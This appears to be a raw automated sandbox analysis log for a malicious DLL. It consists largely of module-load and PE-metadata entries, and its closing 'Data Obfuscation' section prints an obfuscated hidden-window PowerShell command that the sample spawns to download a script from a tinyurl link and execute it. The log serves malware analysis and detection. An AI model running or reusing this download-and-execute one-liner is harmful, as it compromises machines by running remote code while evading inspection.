Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.9.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 5UIy3bo46y.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: 5UIy3bo46y.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 5UIy3bo46y.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 5UIy3bo46y.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 5UIy3bo46y.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5UIy3bo46y.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 5UIy3bo46y.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 5UIy3bo46y.dll Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: 5UIy3bo46y.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ws\System.Management.Automation.pdbpdbj source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb089899H5 source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000014.00000002.2364833973.000002152C5D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B63000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB321000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbD source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb{Q source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb_7 source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbr source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb, source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbX source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.PowerShell.Commands.Utility.pdbi source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs source: powershell.exe, 00000014.00000002.2372611530.000002152C629000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774067227.000002476F732000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automationb.pdb&^ source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbg source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417120815.000001B76A18A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbX source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000014.00000002.2364833973.000002152C5FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb;Q source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbl source: powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89) source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: 5UIy3bo46y.dll
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbr source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2195588775.00000148CB080000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb9 source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdbi source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb? source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000007.00000002.1750975214.00000193E88BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb+Z source: powershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2164598925.000001851B75C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A1DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbM source: powershell.exe, 00000014.00000002.2364833973.000002152C5D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbT source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb^A source: powershell.exe, 00000009.00000002.2197283163.00000148CB32F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000018.00000002.2408826051.000001B769F02000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbx source: powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb[ source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB30D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{4 source: powershell.exe, 00000009.00000002.2197283163.00000148CB32F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB30D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb. source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: &C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: 5UIy3bo46y.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb. source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbG source: powershell.exe, 0000000D.00000002.1783891772.000002476FA01000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ment.Automation.pdb! source: powershell.exe, 0000000D.00000002.1783891772.000002476FA7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbM source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089u source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 56ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1783891772.000002476FA7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb!4Z source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb"fru source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: 5UIy3bo46y.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5UIy3bo46y.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5UIy3bo46y.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5UIy3bo46y.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5UIy3bo46y.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
